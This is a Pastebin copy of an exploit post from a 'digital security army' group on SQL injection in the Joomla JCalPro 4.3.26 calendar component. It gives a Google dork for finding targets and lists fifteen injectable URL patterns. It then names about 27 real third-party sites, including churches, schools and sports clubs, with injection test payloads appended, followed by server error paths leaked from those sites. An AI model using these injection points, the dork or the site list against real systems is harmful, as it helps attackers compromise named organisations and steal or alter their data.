Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Joomla JCalPro Calendar Components 4.3.26 SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 31/01/2019
- # Vendor Homepage : joomlashack.com ~ anything-digital.com
- # Software Download Link : joomlashack.com/joomla-extensions/jcal/
- # Software Information Link : extensions.joomla.org/extension/jcal-pro/
- # Software Version : 4.3.26
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/index.php?option=com_jcalpro''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- # Reference Link : packetstormsecurity.com/files/151427/Joomla-JCalPro-Calendar-4.3.26-SQL-Injection.html
- ####################################################################
- # Description about Software :
- ***************************
- JCal Pro offers simplicity, flexibility, a robust feature set and gorgeous templates
- to fit almost any color scheme. From private and community calendars,
- to event moderation and integration with popular extensions such as JomSocial
- and Community Builder, JCal Pro is sure to fit your calendar needs.
- Almost every organization's web site can benefit from an events calendar.
- For Joomla web sites, the obvious and most popular choice is JCal Pro.
- ####################################################################
- # Impact :
- ***********
- The JCal Pro Calendar component 4.3.26 for Joomla! is prone to an SQL-injection vulnerability
- because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_jcalpro&Itemid=[SQL Injection]
- /index.php?option=com_jcalpro&Itemid=[YEAR]-[MONTH]-[DAY][SQL Injection]
- /index.php?option=com_jcalpro&extmode=cal&Itemid=[SQL Injection]
- /index.php?option=com_jcalpro&extmode=cal&date=[SQL Injection]
- /index.php?option=com_jcalpro&Itemid=[ID-NUMBER]&extmode=cat&cat_id=[ID-NUMBER]&date=[YEAR]-[MONTH]-[DAY][SQL Injection]
- /index.php?option=com_jcalpro&Itemid=[ID-NUMBER]&extmode=cat&cat_id=[SQL Injection]
- /index.php?option=com_jcalpro&Itemid=[ID-NUMBER]&extmode=extcal_search&format=[SQL Injection]
- /index.php?option=com_jcalpro&Itemid=[ID-NUMBER]&view=feeds&format=feed&cat_id=[SQL Injection]
- /index.php?option=com_jcalpro&minical_id=[ID-NUMBER]&extmode=minical&Itemid=[ID-NUMBER]&date=[YEAR]-[MONTH]-[DAY][SQL Injection]
- /index.php?option=com_jcalpro&Itemid=[ID-NUMBER]&extmode=flyer&date=[YEAR]-[MONTH]-[DAY][SQL Injection]
- /index.php?option=com_jcalpro&Itemid=[ID-NUMBER]&extmode=view&extid=[SQL Injection]
- /index.php?option=com_jcalpro&Itemid=[ID-NUMBER]&extmode=week&date=[YEAR]-[MONTH]-[DAY][SQL Injection]
- /index.php?option=com_jcalpro&Itemid=[ID-NUMBER]&extmode=week&date=[SQL Injection]
- /index.php?option=com_jcalpro&extmode=cal&date=[YEAR]-[MONTH]-[DAY][SQL Injection]
- /index.php?option=com_jcalpro&Itemid=[ID-NUMBER]&extmode=view&extid=[ID-NUMBER]&recurdate=[SQL Injection]
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] gimnasiodomingosavio.edu.co/web/index.php?option=com_jcalpro&Itemid=37&extmode=cal&date=2370-12-01%27
- [+] fntchurch.org/index.php?option=com_jcalpro&Itemid=53%27
- [+] twtik.org/tik/index.php?option=com_jcalpro&extmode=cal&date=3133-04-01%27
- [+] kalajoenvapaaseurakunta.com/index.php?option=com_jcalpro&extmode=cal&date=1964-03-01%27
- [+] pmbr.net/portal/index.php?option=com_jcalpro&Itemid=39&extmode=view&extid=7&recurdate=12042180000%27
- [+] muvfex.jo/index.php?option=com_jcalpro&Itemid=102&extmode=week&date=324-02-01%27
- [+] palavraefamilia.org.br/site1/index.php?option=com_jcalpro&Itemid=140&extmode=cal&date=2953-08-01%27
- [+] nfcsports.com/index.php?option=com_jcalpro&extmode=cal&Itemid=37%27
- [+] oxparkrec.org/index.php?option=com_jcalpro&view=calendar&Itemid=96%27
- [+] conseil-psy.fr/index.php?option=com_jcalpro&Itemid=2031:05-28%27
- [+] cittalia.it/index.php?option=com_jcalpro&Itemid=15&extmode=view&extid=702%27
- [+] cimbria.net/joomla/index.php?option=com_jcalpro&Itemid=40&extmode=flyer&date=1031-08-01%27
- [+] bethisraelcc.com/index.php?option=com_jcalpro&Itemid=1&view=feeds&format=feed&cat_id=6%27
- [+] modlet.it/OLD/index.php?option=com_jcalpro&Itemid=77&extmode=cal&date=&date=2016-03-01%27
- [+] notredamedecaderot.fr/index.php?option=com_jcalpro&Itemid=9%27
- [+] 2007.lrv-tirol.at/index.php?option=com_jcalpro&Itemid=48%27
- [+] lusorafting.pt/index.php?option=com_jcalpro&Itemid=145%27
- [+] cofaceneivaltda.com/index.php?option=com_jcalpro&Itemid=284&extmode=extcal_search&format=1%27
- [+] wandererssports.co.nz/index.php?option=com_jcalpro&minical_id=23&extmode=minical&Itemid=1&date=2019-07-01%27
- [+] elmor.com.ve/index.php?option=com_jcalpro&Itemid=218&extmode=cal&date=&date=2020-02-01%27
- [+] seamen.it/index.php?option=com_jcalpro&Itemid=215&extmode=cat&cat_id=12%27
- [+] kirchen-wiesbaden.de/kiwicms/index.php?option=com_jcalpro&Itemid=50&extmode=cat&cat_id=11&date=2026-04-01%27
- [+] firstmet.org/index.php?option=com_jcalpro&Itemid=1&extmode=view&extid=562%27
- [+] greatlakeslotus.com/index.php?option=com_jcalpro&Itemid=31&extmode=view&extid=12%27
- [+] istruzionegenova.it/index.php?option=com_jcalpro&Itemid=1118411111111&extmode=cat&cat_id=1
- [+] peakperformancemartialarts.com/index.php?option=com_jcalpro&Itemid=57&extmode=cal&date=1951-11-01
- [+] crifiano.it/index.php?option=com_jcalpro&Itemid=271
- ####################################################################
- # Example SQL Database Error :
- *****************************
- jos-Warning: Error loading component: com_jcalpro, 1
- JSite -> dispatch() @ /home/firstnew/public_html/index.php:42
- JComponentHelper :: renderComponent() @
- /home/firstnew/public_html/includes/application.php:194
- Deprecated: Function ereg_replace() is deprecated in
- /home/kctik/public_html/tik/components
- /com_jcalpro/config.inc.php on line 447
- Warning: strtoupper() expects parameter 1 to be string, array
- given in /home/kctik/public_html/tik/libraries
- /joomla/environment/request.php on line 97
- Deprecated: Function ereg_replace() is deprecated in
- /home/np51175/public_html/components
- /com_jcalpro/config.inc.php on line 476
- Deprecated: Assigning the return value of new by reference is
- deprecated in /home/pmbr/public_html
- /portal/includes/joomla.php on line 836
- Deprecated: preg_replace(): The /e modifier is deprecated,
- use preg_replace_callback instead in /home/pmbr/public_html
- /portal/includes/phpInputFilter/class.inputfilter.php on line 457
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment